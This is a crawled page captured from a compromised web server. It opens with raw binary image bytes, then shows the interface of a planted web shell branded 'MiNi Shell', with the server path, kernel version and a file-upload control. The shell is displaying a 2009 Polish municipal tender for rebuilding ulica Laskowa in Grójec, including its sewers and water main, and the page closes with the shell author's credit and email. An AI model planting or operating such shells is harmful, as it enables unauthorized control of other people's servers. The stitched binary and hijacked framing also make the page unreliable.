JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/35531-N-2009.html

<p class="kh_header"><b>Grójec: Remont ulicy Laskowej - roboty drogowe oraz budowa kanalizacji sanitarnej, deszczowej i wodociągu</b><br>
<b>Numer ogłoszenia: 35531 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy i Miasta Grójec , ul. Józefa Piłsudskiego 47/12, 05-600 Grójec, woj. mazowieckie, tel. 048 6643091, faks 048 6642103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grojecmiasto.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ulicy Laskowej - roboty drogowe oraz budowa kanalizacji sanitarnej, deszczowej i wodociągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja przedsięwzięcia obejmuje :
odcinek od posesji 19A do posesji 5
1. Kanalizacja sanitarna:  kanał z rur PVC kanałowych o ścianach gładkich o sztywności 8kPa f200mm	-	476.0m
- odgałęzienia (z rur j.w.) do nieruchomości w obszarze pasa drogowego oraz gruncie 
należącym do Gminy
18 kpl  R  f160mm	-	 134.0m
  4 kpl  R  f200mm	-	   28.0m
razem	      	  	 162.0m
	wraz z uzbrojeniem:
- studnie połączeniowe betonowe f1200mm z prefabrykatów łączonych na uszczelki,z pierścieniem odciążającym i włazem żeliwnym klasy D400- 9 kpl
- studzienki inspekcyjne tworzywowe f425mm z włazem  żeliwnym klasy D400
  (do rury teleskopowej)				- 10 kpl

	wraz z robotami przygotowawczymi i towarzyszącymi:
- zabezpieczenia krzyżujących się uzbrojeń w wykopie
	z kabli energetycznych
	z kabli telefonicznych
przewodów gazowych
przewodów cieplnych
- zatrzymanie przez blokadę odpływu na czas jednodniowy ścieków w kanale 
- demontaż zwieńczeń (włazów, płyt pokrywowych, górnego kręgu) istniejących studni
  połączeniowych na kanale istniejącym, przeznaczonym do kasacji, wraz z zasypką
  (z zagęszczeniem) przestrzeni- 9 kpl
- zerwania i odtworzenia cząstkowe nawierzchni poza pasem drogowym
2. Kanalizacja deszczowa : kanał uliczny z rur dwuściennych PP Pragma (lub rur PVC gładkich o sztywności 8kPa)
fi400mm	-	218.0m
fi315mm	-	265.0m
fi200mm	-	    5.0m
razem	             488.0m
- 14 kpl przykanalików z rur  j.w. fi200mm do studzienek wpustowych	              - 50.0m
- 7 kpl odgałęzień w obszarze pasa drogowego z rur j.w. do nieruchomości 
fi200mm	-	  51.0m
fi315mm	-	    8.0m
razem	      	  59.0m
	wraz z uzbrojeniem:
- studnie połączeniowe betonowe fi1200mm z prefabrykatów łączonych na uszczelki,z pierścieniem odciążającym i włazem żeliwnym klasy D400-  14 kpl
- studzienki uliczne wpustowe betonowe fi500mm z osadnikiem standardowe	- 16 kpl
- j.w. lecz z kratą krawężnikową typu Selecta		-    1 kpl
	wraz z robotami przygotowawczymi i towarzyszącymi:
- rozbiórka studzienek ulicznych wpustowych betonowych fi500mm	-    2 kpl 
- zabezpieczenie kabli energetycznych SN i NN, krzyżujących się w wykopie
  (w tym wspólnie dla ks)							
- zabezpieczenie przewodów gazowych, krzyżujących się w wykopie 
  (wspólnie dla ks)								 
3. Sieć wodociągowa:  sieć z rur PVC ciśnieniowych 1 MPa
f160mm	-	  573.0m
f110mm	-	      7.0m
razem		  580.0m
- wraz z 
- 5 kpl odgałęzień DN80 do hydrantów ppoż - 15m
- 1 kpl  przyłącze z rur PVC j.w. f110mm		- 2.5m
- 29 kpl  przyłączy z rur PE
   f40mm (11 kpl)	-	 115.0m
   f63mm (18 kpl)	-	 183.0m
razem	      	  	 298.0m
- w tym
a) wbudowane 1szt. przecisków (pod jezdnią) rurą stalową dz 273.0´8.0mm          długości	- 20m
b) wprowadzone do 25szt. rur osłonowych ułożonych w wykopie otwartym -233m
wraz z uzbrojeniem:
- zasuwami typu F5 (długie) kołnierzowe z żeliwa sferoidalnego umieszczonymi       bezpośrednio w ziemi DN150 - 3szt.; DN100 - 4szt.; DN80 - 5szt.
- przepustnicami dwukołnierzowymi DN150 - 2szt. umieszczonymi w studzienkach
- hydrantami ppoż DN80 typu nadziemnego na odgałęzieniach z zasuwą kołnierzową 
typu F4 (krótką)	- 5 kpl
	wraz z robotami przygotowawczymi i towarzyszącymi:
- demontaż węzłów przyłączeniowych sieciowych i domowych natrafionych
w wykopie										
- demontaż zwieńczeń uzbrojenia przewodów przeznaczonych do kasacji 
- demontaż przewodów istniejących w wykopach dla nowych przewodów
- demontaż studni na sieci wodociągowej 			- 2 kpl
- zabezpieczenie istniejącej infrastruktury - kabli energetycznych, telefonicznych, p. gazowych
4. Roboty drogowe : roboty rozbiórkowe; chodniki ,zjazdy, parkingi  z kostki brukowej 5650,00m2 ; podbudowy i nawierzchnie asfaltobetonowe  4700,00 m2 ; inne roboty towarzyszące.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.13.00-8, 45.23.32.23-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 30.000,00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
	są uprawnieni do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi,
	posiadają uprawnienia niezbędne do wykonania określonych prac,
	posiadają niezbędną wiedzę i doświadczenie, potencjał ekonomiczny i techniczny, a także pracowników zdolnych do wykonania zamówienia, lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
	znajdują się w sytuacji finansowej zapewniającej wykonanie zamówienia,
	nie są wykluczeni na podstawie art. 24 ust. 1 i 2 spełniają wymogi art. 22 ust. 1 u.p.z.p. oraz spełniają warunki dodatkowe zawarte w specyfikacji istotnych warunków zamówienia.,
	wykażą, że zrealizowali w ostatnich 5 latach  roboty o podobnym charakterze, zakresie i wartości nie mniejszej jak 1.000.000,00 zł brutto i potwierdzą to referencjami od zamawiających, 
	udzielą min. 36 - miesięcznej gwarancji na wykonane roboty.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	wypełniony i podpisany formularz ofertowy (na załączonym druku)
2)	aktualny odpis z właściwego rejestru albo aktualnego zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4)	wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich  kwalifikacji niezbędnych do wykonania zamówienia, a także wykonywanych  przez nich czynności (załączyć uprawnienia budowlane oraz aktualne na okres związania ofertą zaświadczenie o członkostwie w Polskiej Izbie Inżynierów Budownictwa);
5)	Wykaz zrealizowanych przez oferenta jako wykonawcy robót w okresie ostatnich pięciu lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych odpowiadających swoim rodzajem i wartością  robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz dokumentami potwierdzającymi że roboty te zostały wykonane należycie(potwierdzonych referencjami inwestorów lub użytkowników). 
Wykaz musi zawierać wskazanie wykonania co rocznie robót kanalizacyjnych i drogowych o wartości nie mniejszej niż 1.000.000,00 brutto łącznie, w tym  wykonania minimum 3 robót (w okresie ostatnich pięciu lat ) o wartości nie mniejszej niż 1.000.000,00 brutto każda.

6)	informacja banku, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
7)	polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej;
8)	oświadczenie o spełnieniu warunków określonych przepisami art. 22 i 24 ustawy PZP (oświadczenie w
załączeniu);
9)	wykaz podwykonawców (w przypadku ich ustanowienia)
10)	harmonogram rzeczowo - finansowy z podziałem na branże.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.przetargi.grojecmiasto.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta Grójec, ul. J. Piłsudskiego 47; 05-600 Grójec, pok. nr 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2009 godzina 12:00, miejsce: Sekretariat - pok. nr 12.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com